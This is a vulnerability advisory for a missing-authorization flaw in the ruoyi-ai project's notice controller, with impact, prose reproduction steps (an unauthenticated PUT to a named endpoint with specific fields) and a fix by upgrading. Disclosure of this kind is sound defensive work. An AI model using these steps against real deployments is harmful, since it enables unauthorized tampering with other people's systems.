ageerle ruoyi-ai Improper Authorization Vulnerability in SysNoticeController

A critical unauthorized access vulnerability has been identified in the ageerle ruoyi-ai project, specifically in versions through 2.0.0. The issue resides in the SysNoticeController component, where the application fails to properly authorize users before allowing them to modify or query notification information. This vulnerability can be exploited remotely without any authentication, potentially leading to unauthorized changes in the system's announcement data.

Impact

Exploitation of this vulnerability allows unauthorized users to access, modify, and delete notification information within the system, disrupting the management of user communications.

Reproduction

The vulnerability can be reproduced by sending a PUT request to the '/prod-api/system/notice' endpoint without any authorization credentials. The request must include the noticeId, noticeTitle, and noticeContent fields in the payload. Once the notice is modified, the change can be verified by querying the notice list, which will reflect the unauthorized modification.

Remediation

Users are advised to upgrade to ageerle ruoyi-ai version 2.0.1, which addresses this vulnerability by implementing proper authorization checks in the SysNoticeController.